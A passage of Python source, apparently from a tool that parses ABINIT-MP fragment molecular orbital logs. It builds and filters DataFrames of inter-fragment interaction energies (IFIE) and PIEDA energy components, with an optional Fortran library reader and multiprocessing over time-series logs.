tgtmolfrags)\n print('ifdf_filter\\n', ifdf_filter.head())\n\n # merge ifie and pieda\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n\n ## screening dist\n if self.dist != 1000.0:\n ifdf_filter = ifdf_filter[ifdf_filter['DIST'] < self.dist]\n\n HF_IFIE_sum = ifdf_filter['HF-IFIE'].sum()\n MP2_IFIE_sum = ifdf_filter['MP2-IFIE'].sum()\n PR_TYPE1_sum = ifdf_filter['PR-TYPE1'].sum()\n GRIMME_sum = ifdf_filter['GRIMME'].sum()\n JUNG_sum = ifdf_filter['JUNG'].sum()\n HILL_sum = 
ifdf_filter['HILL'].sum()\n\n ES_sum = ifdf_filter['ES'].sum()\n EX_sum = ifdf_filter['EX'].sum()\n CT_sum = ifdf_filter['CT-mix'].sum()\n DI_sum = ifdf_filter['DI(MP2)'].sum()\n q_sum = ifdf_filter['q(I=>J)'].sum()\n\n ifdf_filter['TIMES'] = self.tgttimes[i]\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum], index=self.ifdfsumcolumn, name=self.tgttimes[i])\n print('ifdfsum\\n', ifdfsum)\n ifdf_filters.append(ifdf_filter)\n ifdfsums.append(ifdfsum)\n\n return ifdf_filters, ifdfsums\n\n\n def getfiltifpifd(self, i, ifdf, pidf, momenedf=None, dimenedf=None, bssedf=None):\n # in class var: tgttime\n # local var: i, ifdf,pidf\n # out local var: tgtifdfsum, tgtdf_filter\n # pitgtdfsum, pitgtedf\n\n # get tgt frag id\n ifdf, ifdf_filter = self.gettgtdf_fd(ifdf)\n\n # merge ifiedf and pieda df\n ifdf_filter = pd.merge(ifdf_filter, pidf, on=['I', 'J'], how='left')\n\n # merge filtered-ifie data and dimer energy data\n if self.is_momdimene:\n ifdf_filter = pd.merge(ifdf_filter, dimenedf, on=['I', 'J'], how='left')\n\n # merge ifiedf and pieda df\n if self.is_bsse:\n ifdf_filter = pd.merge(ifdf_filter, bssedf, on=['I', 'J'], how='left')\n\n print(ifdf_filter.head())\n ifdf_filter['TIMES'] = self.tgttimes[i]\n HF_IFIE_sum = ifdf_filter['HF-IFIE'].sum()\n MP2_IFIE_sum = ifdf_filter['MP2-IFIE'].sum()\n PR_TYPE1_sum = ifdf_filter['PR-TYPE1'].sum()\n GRIMME_sum = ifdf_filter['GRIMME'].sum()\n JUNG_sum = ifdf_filter['JUNG'].sum()\n HILL_sum = ifdf_filter['HILL'].sum()\n ES_sum = ifdf_filter['ES'].sum()\n EX_sum = ifdf_filter['EX'].sum()\n CT_sum = ifdf_filter['CT-mix'].sum()\n DI_sum = ifdf_filter['DI(MP2)'].sum()\n q_sum = ifdf_filter['q(I=>J)'].sum()\n\n try:\n HF_BSSE_sum = ifdf_filter['HF-BSSE'].sum()\n MP2_BSSE_sum = ifdf_filter['MP2-BSSE'].sum()\n except:\n HF_BSSE_sum = 0\n MP2_BSSE_sum = 0\n\n # data for bsse\n try:\n momenetgtdf = momenedf[momenedf['Frag.'] == self.momfrag]\n momene_tgt = momenetgtdf['HF'][0] + momenetgtdf['MP2'][0]\n momlabel = 'MonomerEnergy(' + str(self.momfrag) + ')'\n except:\n momene_tgt = None\n momlabel = 'MonomerEnergy(' + str(self.momfrag) + ')'\n\n try:\n # dimene_tgt = momenedf['HF'][0] + momenedf['MP2'][0]\n dimenetgtdf = dimenedf[((dimenedf['I'] == self.dimfrag1) & (dimenedf['J'] == self.dimfrag2)) | ((dimenedf['I'] == self.dimfrag2) & (dimenedf['J'] == self.dimfrag1))]\n dimene_tgt = dimenetgtdf['DIMER-HF'][0] + dimenetgtdf['DIMER-MP2'][0]\n dimlabel = 'DimerEnergy(' + str(self.dimfrag1) + '-' + str(self.dimfrag2) + ')'\n\n except:\n dimene_tgt = None\n dimlabel = 'DimerEnergy(' + str(self.dimfrag1) + '-' + str(self.dimfrag2) + ')'\n\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, q_sum, momene_tgt, dimene_tgt, HF_BSSE_sum, MP2_BSSE_sum], index=self.ifdfsumcolumn + [momlabel, dimlabel] + ['HF-BSSE', 'MP2-BSSE'], name=self.tgttimes[i])\n # print(ifdfsum)\n\n # pieda\n# frags = self.frags\n# if self.fragmode != 'manual':\n# # print('len_frags', len(frags))\n# #assign resname(e.g. 
Gly6)\n# for j in range(1, len(frags) + 1):\n# ifdf_filter.I = ifdf_filter.I.replace(j, frags[j-1])\n# ifdf_filter.J = ifdf_filter.J.replace(j, frags[j-1])\n\n # print(ifdf_filter)\n return ifdf_filter, ifdfsum\n\n\n def read_ifpif90(self, tgtlog):\n '''read ifpif90.so and call readifiepieda_\n Args:\n tgtlog (str): target log file name\n Returns:\n ifdf_filters (list): list of ifdf_filter\n '''\n\n print('read', tgtlog)\n if not os.path.exists(tgtlog):\n print('Warning:', tgtlog, 'is not exist: skip data')\n return []\n f = np.ctypeslib.load_library(self.f90sofile, \".\")\n\n f.readifiepieda_.argtypes = [\n c_char_p,\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.float64),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n np.ctypeslib.ndpointer(dtype=np.int32),\n ]\n\n instr = tgtlog\n enc_str = instr.encode('utf-8')\n instr = create_string_buffer(enc_str)\n\n ifi = np.empty(100000000, dtype=np.int32)\n ifj = np.empty(100000000, dtype=np.int32)\n pii = np.empty(100000000, dtype=np.int32)\n pij = np.empty(100000000, dtype=np.int32)\n dist = np.empty(100000000, dtype=np.float64)\n hfifie = np.empty(100000000, dtype=np.float64)\n mp2ifie = np.empty(100000000, dtype=np.float64)\n prtype1 = np.empty(100000000, dtype=np.float64)\n grimme = np.empty(100000000, dtype=np.float64)\n jung = np.empty(100000000, dtype=np.float64)\n hill = np.empty(100000000, dtype=np.float64)\n es = np.empty(100000000, dtype=np.float64)\n ex = np.empty(100000000, dtype=np.float64)\n ct = np.empty(100000000, dtype=np.float64)\n di = np.empty(100000000, dtype=np.float64)\n erest = np.empty(100000000, dtype=np.float64)\n qval = np.empty(100000000, dtype=np.float64)\n fdimesint = np.empty(100000000, dtype=np.int32)\n ifpair = np.empty(1, dtype=np.int32)\n pipair = np.empty(1, dtype=np.int32)\n\n f.readifiepieda_(instr, ifi, ifj, pii, pij, dist, hfifie, mp2ifie, prtype1, grimme, jung, hill, es, ex, ct, di, erest, qval, fdimesint, ifpair, pipair)\n\n if ifpair == 0:\n print('Warning:', tgtlog, 'is not converged: skip data')\n return []\n #check\n # print ('i', ifi[0], ifj[0])\n # print ('j', ifi[1], ifj[1])\n # print ('dist', dist[0:2])\n # print ('dist', hfifie[0:2])\n # print ('fdimesint', fdimesint[0:2])\n print ('ifpair', ifpair, 'pipair', pipair)\n\n # fdimesstr = []\n # for i in range(ifpair[0]):\n # if fdimesint[i] == 1:\n # fdimesstr.append('F')\n # elif fdimesint[i] == 2:\n # fdimesstr.append('T')\n\n # MP3 case\n if self.logMethod == 'MP3':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'USER-MP2', 'MP3-IFIE','USER-MP3', 'PADE[2/1]' ]\n\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n 
ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['USER-MP2'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['MP3-IFIE'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['USER-MP3'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['PADE[2/1]'] = copy.deepcopy(hill[:ifpair[0]])\n\n # CCPT case\n elif self.logMethod == 'CCPT':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'GRIMME-MP2', 'MP3-IFIE','GRIMME-MP3', 'MP4-IFIE' ]\n\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['GRIMME-MP2'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['MP3-IFIE'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['GRIMME-MP3'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['MP4-IFIE'] = copy.deepcopy(hill[:ifpair[0]])\n\n # MP2 case\n else:\n ifdf = pd.DataFrame(columns=self.icolumn)\n ifdf['I'] = copy.deepcopy(ifi[:ifpair[0]])\n ifdf['J'] = copy.deepcopy(ifj[:ifpair[0]])\n ifdf['DIST'] = copy.deepcopy(dist[:ifpair[0]])\n ifdf['DIMER-ES'] = copy.deepcopy(fdimesint[:ifpair[0]])\n ifdf['HF-IFIE'] = copy.deepcopy(hfifie[:ifpair[0]])\n ifdf['MP2-IFIE'] = copy.deepcopy(mp2ifie[:ifpair[0]])\n ifdf['PR-TYPE1'] = copy.deepcopy(prtype1[:ifpair[0]])\n ifdf['GRIMME'] = copy.deepcopy(grimme[:ifpair[0]])\n ifdf['JUNG'] = copy.deepcopy(jung[:ifpair[0]])\n ifdf['HILL'] = copy.deepcopy(hill[:ifpair[0]])\n\n # PIEDA\n pidf = pd.DataFrame(columns=self.pcolumn)\n pidf['I'] = copy.deepcopy(pii[:pipair[0]])\n pidf['J'] = copy.deepcopy(pij[:pipair[0]])\n pidf['ES'] = copy.deepcopy(es[:pipair[0]])\n pidf['EX'] = copy.deepcopy(ex[:pipair[0]])\n pidf['CT-mix'] = copy.deepcopy(ct[:pipair[0]])\n pidf['DI(MP2)'] = copy.deepcopy(di[:pipair[0]])\n # LRD\n if self.is_disp:\n pidf['Erest'] = copy.deepcopy(erest[:pipair[0]])\n pidf['q(I=>J)'] = copy.deepcopy(qval[:pipair[0]])\n\n return [ifdf, pidf]\n\n\n def read_ifpimulti(self, i):\n ''' read ifpi and pieda from multi log file\n Args:\n i: log number\n Returns:\n ifdf: ifpi dataframe\n pidf: pieda dataframe\n '''\n\n # i: log number\n # read ifpi f90\n momenedf = None\n if self.f90soflag:\n # get ifie using f90 module\n print(\"use fortran library\")\n dfs = self.read_ifpif90(self.tgtlogs[i])\n if len(dfs) == 0:\n return None\n ifdf, pidf = dfs\n\n # note: nof90(py) mode only can get momnomer energy\n else:\n dfs = self.read_ifiepiedas(self.tgtlogs[i])\n if len(dfs) == 0:\n return None\n ifdf, pidf, momenedf, dimenedf, bssedf = dfs\n\n # IFIE pieda filter\n tgt2type = self.tgt2type\n print('tgttimes', self.tgttimes[i])\n print('tgt2type', tgt2type)\n\n # frag mode\n if tgt2type == 'frag':\n if self.matrixtype == 'times-frags':\n hfdfs = []\n mp2corrdfs =[]\n prmp2corrdfs =[]\n mp2tdfs =[]\n prmp2tdfs =[]\n esdfs = []\n exdfs = []\n ctdfs = []\n didfs = []\n distdfs = []\n erestdfs = []\n for tmptgt1 in self.tgt1frag:\n hfdf, mp2corrdf, prmp2corrdf, mp2tdf, prmp2tdf, distdf = self.gettgtdf_n2tfmatrix(i, ifdf, tmptgt1)\n esdf, exdf, didf, ctdf = self.gettgtpidf_n2tfmatrix(i, pidf, hfdf, tmptgt1)\n hfdfs.append(hfdf)\n mp2corrdfs.append(mp2corrdf)\n prmp2corrdfs.append(prmp2corrdf)\n mp2tdfs.append(mp2tdf)\n prmp2tdfs.append(prmp2tdf)\n distdfs.append(distdf)\n esdfs.append(esdf)\n exdfs.append(exdf)\n ctdfs.append(ctdf)\n 
didfs.append(didf)\n erestdfs.append(prmp2corrdf - didf)\n return hfdfs, mp2corrdfs, prmp2corrdfs, mp2tdfs, prmp2tdfs, esdfs, exdfs, ctdfs, distdfs, didfs, erestdfs\n\n else:\n ifdf_filter = self.getfiltifpiff(i, ifdf, pidf)\n iftgtdfsum = None\n return ifdf_filter\n\n # molname mode\n if tgt2type == 'molname':\n ifdf_filters, ifdfsums = self.getfiltifpifm(i, ifdf, pidf)\n return ifdf_filters, ifdfsums\n\n # dist or dimer-es mode\n if tgt2type in ['dist', 'dimer-es']:\n if self.is_momdimene:\n if self.is_bsse:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, momenedf, dimenedf, bssedf)\n return ifdf_filter, ifdfsum\n else:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, momenedf, dimenedf)\n return ifdf_filter, ifdfsum\n else:\n if self.is_bsse:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf, None, None, bssedf)\n return ifdf_filter, ifdfsum\n else:\n ifdf_filter, ifdfsum = self.getfiltifpifd(i, ifdf, pidf)\n return ifdf_filter, ifdfsum\n\n else:\n print('tgt2type error!!')\n return\n\n def readmultiifie(self):\n # check disp(LRD)\n self.is_disp = self.getisdisp(self.tgtlogs[0])\n print('## read multi mode')\n st = time.time()\n p = Pool(self.pynp)\n\n # main-read module\n ifpidfs = p.map(self.read_ifpimulti, [i for i in range(len(self.tgtlogs))])\n # i: time j:type, k:tgt1frag\n # [[hfdf[time 1][frag 1, frag2...], , mp2df[time 1], ...], [hfdf[time 2], mp2df[time 2], ...], ...]\n pd.set_option('display.width', 500)\n print('valid data num:', len(ifpidfs))\n # print(ifpidfs)\n\n # delete label of unfinished log\n delids = []\n for i in range(len(ifpidfs)):\n try:\n if ifpidfs[i] is None:\n delids.append(i)\n except:\n pass\n dellist = lambda items, indexes: [item for index, item in enumerate(items) if index not in indexes]\n ifpidfs = dellist(ifpidfs, delids)\n\n # filter section\n if self.tgt2type == 'frag':\n if self.matrixtype == 'times-frags':\n self.hfdfs = []\n self.mp2corrdfs = []\n self.prmp2corrdfs = []\n self.mp2tdfs = []\n self.prmp2tdfs = []\n self.esdfs = []\n self.exdfs = []\n self.ctdfs = []\n self.distdfs = []\n self.didfs = []\n self.erestdfs = []\n print('readable file num:', len(ifpidfs))\n for i in range(len(self.tgt1frag)):\n hfdf = pd.concat([dfs[0][i] for dfs in ifpidfs], axis=1)\n mp2corrdf = pd.concat([dfs[1][i] for dfs in ifpidfs], axis=1)\n prmp2corrdf = pd.concat([dfs[2][i] for dfs in ifpidfs], axis=1)\n mp2tdf = pd.concat([dfs[3][i] for dfs in ifpidfs], axis=1)\n prmp2tdf = pd.concat([dfs[4][i] for dfs in ifpidfs], axis=1)\n esdf = pd.concat([dfs[5][i] for dfs in ifpidfs], axis=1)\n exdf = pd.concat([dfs[6][i] for dfs in ifpidfs], axis=1)\n ctdf = pd.concat([dfs[7][i] for dfs in ifpidfs], axis=1)\n distdf = pd.concat([dfs[8][i] for dfs in ifpidfs], axis=1)\n didf = pd.concat([dfs[9][i] for dfs in ifpidfs], axis=1)\n erestdf = pd.concat([dfs[10][i] for dfs in ifpidfs], axis=1)\n\n self.hfdfs.append(hfdf)\n self.mp2corrdfs.append(mp2corrdf)\n self.prmp2corrdfs.append(prmp2corrdf)\n self.mp2tdfs.append(mp2tdf)\n self.prmp2tdfs.append(prmp2tdf)\n self.esdfs.append(esdf)\n self.exdfs.append(exdf)\n self.ctdfs.append(ctdf)\n self.distdfs.append(distdf)\n self.didfs.append(didf)\n self.erestdfs.append(erestdf)\n else:\n self.ifdf_filters = pd.DataFrame()\n for dfs in ifpidfs:\n self.ifdf_filters = self.ifdf_filters.append(dfs)\n\n if self.tgt2type in ['dist', 'dimer-es']:\n self.ifdf_filters = pd.DataFrame()\n self.ifdfsum = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n for dfs in ifpidfs:\n # for j in dfs:\n # print('aaaaa', j)\n 
self.ifdf_filters = self.ifdf_filters.append(dfs[0])\n self.ifdfsum = self.ifdfsum.append(dfs[1])\n\n if self.tgt2type in ['molname']:\n self.ifdf_filters = []\n self.ifdfsum = []\n\n nfrag = len(ifpidfs[0][0])\n print('nfrag', nfrag)\n # i:time, j:frag\n for j in range(nfrag):\n ifdf_filter = pd.DataFrame()\n ifdfsum = pd.DataFrame(columns=self.ifdfsumcolumn)\n for i in range(len(ifpidfs)):\n ifdf_filter = ifdf_filter.append(ifpidfs[i][0][j])\n ifdfsum = ifdfsum.append(ifpidfs[i][1][j])\n\n self.ifdf_filters.append(ifdf_filter)\n self.ifdfsum.append(ifdfsum)\n\n # print(self.ifdf_filters)\n # print(self.ifdfsum)\n # print('len ifdf_filters', len(self.ifdf_filters))\n # print('len ifdfsum', len(self.ifdfsum))\n\n p.close()\n print('read elapsed', time.time() - st)\n\n return\n\n def readsingleifie(self):\n '''read single mode\n\n read ifie single mode\n\n Args:\n None\n Returns:\n None(self.ifdf, self.pidf, self.pbifdf, self.pbpidf)\n '''\n\n print('## read single mode')\n self.logMethod = self.getlogmethod(self.tgtlogs)\n if self.logMethod == 'HF':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE']\n elif self.logMethod == 'MP3':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'USER-MP2', 'MP3-IFIE','USER-MP3', 'PADE[2/1]' ]\n elif self.logMethod == 'CCPT':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'GRIMME-MP2', 'MP3-IFIE','GRIMME-MP3', 'MP4-IFIE' ]\n self.getpbflag(self.tgtlogs)\n\n # self.logMethod = 'MP2'\n if self.matrixtype != 'frags-frags' and (self.logMethod == 'MP3' or self.logMethod == 'CCPT'):\n print('Error: ' + self.logMethod + ' mode for this mode is unsupported yet.')\n sys.exit()\n\n # pb python-based capture only in this version.\n if self.pbflag:\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(self.tgtlogs)\n df = self.getifiedf(ifie)\n self.ifdf = df\n\n pidf = self.getpiedadf(pieda)\n self.pidf = pidf\n\n # pbpieda\n pbifie, pbpieda, solvterm = self.read_pbifiepieda(self.tgtlogs)\n pbifdf = self.getifiedf(pbifie, solvterm)\n self.pbifdf = pbifdf\n\n pbpidf = self.getpbpiedadf(pbpieda)\n self.pbpidf = pbpidf\n\n # debug write\n # print(self.pbifdf)\n # sys.exit()\n return self\n\n if self.f90soflag is True:\n print(\"use fortran library\")\n ifpidfs = self.read_ifpif90(self.tgtlogs)\n self.ifdf = ifpidfs[0]\n self.pidf = ifpidfs[1]\n # print(self.ifdf)\n # print(self.pidf)\n\n else:\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(self.tgtlogs)\n df = self.getifiedf(ifie)\n self.ifdf = df\n\n pidf = self.getpiedadf(pieda)\n self.pidf = pidf\n\n return\n\n\n def readifiewrap(self, item1=None, item2=None, item3=None):\n '''read ifie and pieda\n Args:\n item1: tgtlogs\n item2: tgt1frag\n item3: tgt2type\n Returns:\n '''\n\n # param setup\n self.setupreadparm(item1, item2, item3)\n\n # multi mode (read and filter)\n if self.anlmode == 'multi':\n self.readmultiifie()\n # single mode\n else:\n self.readsingleifie()\n\n return self\n\n def getisdisp(self, tgtlog):\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if len(Items) <= 2:\n continue\n if Items[0:3] == ['Disp', '=', 'ON']:\n print('MP2-LRD single shot mode')\n return True\n return False\n\n def getlogmethod(self, tgtlog):\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if len(Items) <= 2:\n continue\n if Items[0:2] == ['Method', '=']:\n print('logMethod =', Items[2])\n return Items[2]\n\n def getpbflag(self, tgtlog):\n self.pbflag = False\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if 
len(Items) <= 2:\n continue\n if Items[0:2] == ['EFFECT', '=']:\n if Items[2] == 'ON':\n self.pbflag = True\n print('PB effect =', Items[2])\n if Items[0:3] == ['##', 'CHECK', 'AVAILABLE']:\n break\n\n return\n\n def setupreadparm(self, item1=None, item2=None, item3=None):\n '''setup read parameter\n Args:\n item1: tgt1\n item2: tgt2\n item3: tgt3\n Returns:\n tgtlogs: list of log files\n tgtpdbs: list of pdb files\n tgttimes: list of time steps\n '''\n\n tgtlogs = []\n tgtpdbs = []\n tgttimes = []\n\n if self.anlmode == 'multi' and self.tgt2type == 'molname':\n self.rpdbflag = True\n\n # multi mode\n if self.anlmode == 'multi':\n # item1: tgt1\n # item2: tgt2\n print('tgt2type:', self.tgt2type)\n\n # setup tgttimes, logs, and pdbs\n for i in range(self.start, self.end+1, self.interval):\n tgttimes.append(str(i).zfill(self.zp))\n tgtlogs.append(self.ilog_head + str(i).zfill(self.zp) + self.ilog_tail)\n print('tgtlogs', tgtlogs)\n\n # setup tgt1frag\n if item1 is not None:\n print('type', type(item1))\n if type(item1) == str:\n if '-' in item1:\n tgt = item1.split('-')\n print('tgt', tgt)\n self.tgt1frag = [i for i in range(int(tgt[0]), int(tgt[1]) + 1)]\n if self.tgt1frag in self.tgt1frag:\n del self.tgt1frag[self.tgt1frag.index(self.tgt1frag)]\n else:\n self.tgt1frag = list(map(int, item1.split(',')))\n print(self.tgt1frag)\n else:\n self.tgt1frag = item1\n\n self.tgtlogs = tgtlogs\n self.tgttimes = tgttimes\n\n # setup tgt2frag\n if self.tgt2type == 'frag':\n if item2 != None:\n print('type', type(item2))\n if item2[-1] == '-':\n print('check tgt2 frags')\n\n self.tgt2frag = []\n for i in range(len(tgtlogs)):\n self.resname_perfrag, tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n nf = self.getlognf(tgtlogs[i], self.fragmode)\n tgt = item2.split('-')[0]\n print('tgt', tgt)\n tgt2frag = [i for i in range(int(tgt), nf + 1)]\n self.tgt2frag.append(tgt2frag)\n\n elif type(item2) == str:\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt', tgt)\n self.tgt2frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n if self.tgt1frag in self.tgt2frag:\n del self.tgt2frag[self.tgt2frag.index(self.tgt1frag)]\n else:\n self.tgt2frag = list(map(int, item2.split(',')))\n print(self.tgt2frag)\n else:\n self.tgt2frag = [item2]\n if type(self.tgt2frag) == list:\n for dfrag in self.exceptfrag:\n try:\n del self.tgt2frag[self.tgt2frag.index(dfrag)]\n print('- Info: del frag', dfrag, 'from tgt2')\n except:\n pass\n print('tgt1frag, tgt2frag', self.tgt1frag, self.tgt2frag)\n\n\n if self.tgt2type == 'molname':\n if item2 != None:\n self.tgt2molname = item2\n print('tgt1frag, tgt2mol', self.tgt1frag, self.tgt2molname)\n\n\n if self.rpdbflag == True:\n nfs = []\n molnames_perrec = []\n resnamenonums_perfrag = []\n self.assignmolname = False\n for i in range(len(tgtlogs)):\n self.resname_perfrag, tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n tgtpdbs.append(tgtpdb)\n# if self.fragmode == 'auto':\n# print('Error: auto fragment in mol mode is not suppoted yet.')\n# sys.exit()\n nf = self.getlognf(tgtlogs[i], self.fragmode)\n nfs.append(nf)\n molnames_perrec.append(self.resnames)\n resnamenonums_perfrag.append(self.resnamenonum_perfrag)\n self.nfs = nfs\n self.molnames_perrec = molnames_perrec\n self.resnamenonums_perfrag = resnamenonums_perfrag\n self.tgtpdbs = tgtpdbs\n\n # single mode\n # item1 log\n # item2 tgt1\n # item3 tgt2\n else:\n if item1 is not None:\n self.tgtlogs = item1\n if item2 is not None:\n if self.anlmode == 'mol' and self.selecttype == 'molid':\n self.tgtmolid = int(item2)\n else:\n 
print('item2', item2)\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt1', tgt)\n self.tgt1frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n\n# if type(eval(item2)) != list:\n# self.tgt1frag = [item2]\n# else:\n# self.tgt1frag = eval(item2)\n\n else:\n self.tgt1frag = list(map(int, item2.split(',')))\n print(self.tgt1frag)\n\n if self.anlmode == 'fraginmol' or self.anlmode == 'mol':\n if type(self.tgtmolid) == str:\n if '-' in self.tgtmolid:\n tgt = self.tgtmolid.split('-')\n print('tgtmol', tgt)\n self.tgtmolid = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n self.tgtmolid = [eval(self.tgtmolid)]\n\n elif type(self.tgtmolid) == int:\n self.tgtmolid = [self.tgtmolid]\n\n if self.tgt2type == 'frag' or self.tgt2type == 'dist':\n if item2 is not None:\n # print('type tgt2', type(item2))\n if type(item2) == str:\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt1', tgt)\n self.tgt1frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n print('check2')\n self.tgt1frag = list(map(int, item2.split(',')))\n print(self.tgt1frag)\n\n# if type(eval(item2)) != list:\n# self.tgt1frag = [eval(item2)]\n# else:\n# self.tgt1frag = eval(item2)\n else:\n self.tgt1frag = [item2]\n\n if self.tgt2type == 'frag':\n if item3 is not None:\n # print('type tgt2', type(item3))\n if type(item3) == str:\n if '-' in item3:\n tgt = item3.split('-')\n print('tgt2', tgt)\n self.tgt2frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n self.tgt2frag = list(map(int, item3.split(',')))\n print(self.tgt2frag)\n # self.tgt2frag = [eval(item3)]\n else:\n self.tgt2frag = [item3]\n\n if self.matrixtype == 'frags-frags':\n print(self.tgt1frag, self.tgt2frag)\n# dp = set(self.tgt1frag) & set(self.tgt2frag)\n# if len(dp) != 0:\n# print('Error! 
tgt1 and tgt2 is duplicate')\n# sys.exit()\n\n if type(self.tgt2frag) == list:\n for dfrag in self.exceptfrag:\n try:\n del self.tgt2frag[self.tgt2frag.index(dfrag)]\n print('- Info: del frag', dfrag, 'from tgt2')\n except:\n pass\n\n # PIEDA\n if self.abinit_ver == 'rev16' or self.abinit_ver == 'rev17':\n self.pcolumn = ['I', 'J', 'ES', 'EX', 'CT-mix', 'Solv(ES)', 'DI(MP2)', 'q(I=>J)']\n\n # get resname reference\n if self.addresinfo == True or self.rpdbflag == True or self.anlmode == 'fraginmol':\n print('\\n## read reference resname')\n if type(self.tgtlogs) == list:\n for i in range(len(self.tgtlogs)):\n self.resname_perfrag, self.tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n if len(self.resname_perfrag) != 0:\n break\n else:\n print('cannot read frag data:', self.tgtlogs[i])\n else:\n self.resname_perfrag, self.tgtpdb = self.getlogorpdbfrag(self.tgtlogs)\n\n # print section\n print ('\\n## input summary')\n try:\n print('- tgtlogs:', self.tgtlogs)\n print('- anlmode:', self.anlmode)\n print('- tgtfrag:', self.tgt1frag, self.tgt2frag)\n print('- anlmode:' ,self.anlmode)\n print('- fragmode:', self.fragmode)\n print('- NP:', self.pynp)\n print('- addresflag', self.addresinfo)\n except:\n pass\n print('## input summary end\\n')\n\n ### read fraginfo section\n# frags = []\n# if self.fragmode != 'manual':\n# frags = self.read_fraginfo(self.tgtlogs)\n# # print('frags', frags)\n#\n# if self.fragmode == 'hybrid':\n# getf = frags.pop(hyfrag-1)\n# for i in range(self.hynum):\n# frags.append(getf)\n# # print('frags', frags)\n#\n# self.frags = frags\n\n ## filter section\n def filterifiewrap(self, dist=None, myifdf=None, mypidf=None, is_pb=False):\n\n tgt2type = self.tgt2type\n if dist is not None:\n self.dist = dist\n # frag mode\n if self.anlmode == 'frag':\n if self.matrixtype == 'frags-frags':\n self.gettgtdf_n2ffmatrix(myifdf)\n self.gettgtpidf_n2ffmatrix(mypidf, is_pb)\n\n else:\n if tgt2type in ['dist', 'dimer-es']:\n print(self.ifdf)\n tgtdf, ifdf_filter = self.gettgtdf_fd(self.ifdf)\n self.ifdf_filter = pd.merge(ifdf_filter,\n self.pidf, on=['I', 'J'], how='left')\n print(self.ifdf_filter)\n\n if self.pbflag is True:\n pbtgtdf, pbifdf_filter = self.gettgtdf_fd(self.pbifdf)\n self.pbifdf_filter = pd.merge(\n pbifdf_filter, self.pbpidf, on=['I', 'J'], how='left')\n print(self.pbifdf_filter)\n\n elif tgt2type == 'frag':\n self.ifdf_filters = []\n self.pbifdf_filters = []\n\n if type(self.tgt1frag) == int:\n self.tgt1frag == [self.tgt1frag]\n if type(self.tgt2frag) == int:\n 